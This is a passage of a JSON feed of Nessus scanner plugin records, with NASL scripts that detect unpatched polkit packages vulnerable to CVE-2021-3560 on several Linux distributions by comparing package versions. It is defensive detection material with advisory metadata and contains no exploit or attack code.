thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n \"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-04T14:54:56", "description": "The remote host is affected by the vulnerability described in GLSA-202107-31 (polkit: Privilege escalation)\n\n The function polkit_system_bus_name_get_creds_sync() was called without checking for error, and as such temporarily treats the authentication request as coming from root.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "nessus", "title": "GLSA-202107-31 : polkit: Privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-15T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:polkit", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202107-31.NASL", "href": "https://www.tenable.com/plugins/nessus/156969", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202107-31.\n#\n# The advisory text is Copyright (C) 2001-2023 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(156969);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/15\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"GLSA\", value:\"202107-31\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"GLSA-202107-31 : polkit: Privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202107-31\n(polkit: Privilege escalation)\n\n The function polkit_system_bus_name_get_creds_sync() was called without\n checking for error, and as such temporarily treats the authentication\n request as coming from root.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202107-31\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All polkit users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-auth/polkit-0.119'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-auth/polkit\", unaffected:make_list(\"ge 0.119\"), vulnerable:make_list(\"lt 0.119\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:55:44", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1843-1 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-16T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : polkit (openSUSE-SU-2021:1843-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libpolkit0", "p-cpe:/a:novell:opensuse:libpolkit0-32bit", "p-cpe:/a:novell:opensuse:polkit", "p-cpe:/a:novell:opensuse:polkit-devel", "p-cpe:/a:novell:opensuse:typelib-1_0-polkit-1_0", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-1843.NASL", "href": "https://www.tenable.com/plugins/nessus/151717", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1843-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151717);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"openSUSE 15 Security Update : polkit (openSUSE-SU-2021:1843-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1843-1 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186497\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2NCYKG2YTUVFTW5R7DJWWWJGLDWU7XE5/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7e3dbaa\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpolkit0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-Polkit-1_0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'libpolkit0-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libpolkit0-32bit-0.116-3.3.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'typelib-1_0-Polkit-1_0-0.116-3.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libpolkit0 / libpolkit0-32bit / polkit / polkit-devel / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:22:18", "description": "The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the ALSA-2021:2238 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "AlmaLinux 8 : polkit (ALSA-2021:2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:alma:linux:polkit", "p-cpe:/a:alma:linux:polkit-devel", "p-cpe:/a:alma:linux:polkit-docs", "p-cpe:/a:alma:linux:polkit-libs", "cpe:/o:alma:linux:8"], "id": "ALMA_LINUX_ALSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/157562", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# AlmaLinux Security Advisory ALSA-2021:2238.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157562);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"ALSA\", value:\"2021:2238\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"AlmaLinux 8 : polkit (ALSA-2021:2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote AlmaLinux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote AlmaLinux 8 host has packages installed that are affected by a vulnerability as referenced in the\nALSA-2021:2238 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.almalinux.org/8/ALSA-2021-2238.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:alma:linux:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:alma:linux:8\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Alma Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AlmaLinux/release\", \"Host/AlmaLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/AlmaLinux/release');\nif (isnull(release) || 'AlmaLinux' >!< release) audit(AUDIT_OS_NOT, 'AlmaLinux');\nvar os_ver = pregmatch(pattern: \"AlmaLinux release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'AlmaLinux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'AlmaLinux 8.x', 'AlmaLinux ' + os_ver);\n\nif (!get_kb_item('Host/AlmaLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'AlmaLinux', cpu);\n\nvar pkgs = [\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:22", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Polkit PHSA-2021-2.0-0350", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2021-2_0-0350_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150288", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0350. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150288);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 2.0: Polkit PHSA-2021-2.0-0350\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-350.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'polkit-0.113-6.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'polkit-devel-0.113-6.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:56:12", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:2555 advisory.\n\n - dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient (CVE-2021-25217)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-06T00:00:00", "type": "nessus", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.7.19 packages and (RHSA-2021:2555)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-25217", "CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:cri-o", "p-cpe:/a:redhat:enterprise_linux:dhcp-client", "p-cpe:/a:redhat:enterprise_linux:dhcp-common", "p-cpe:/a:redhat:enterprise_linux:dhcp-libs", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-cni", "p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-common", "p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-controller", "p-cpe:/a:redhat:enterprise_linux:polkit", "p-cpe:/a:redhat:enterprise_linux:polkit-libs", "p-cpe:/a:redhat:enterprise_linux:python3-kuryr-kubernetes"], "id": "REDHAT-RHSA-2021-2555.NASL", "href": "https://www.tenable.com/plugins/nessus/151426", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2555. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151426);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", 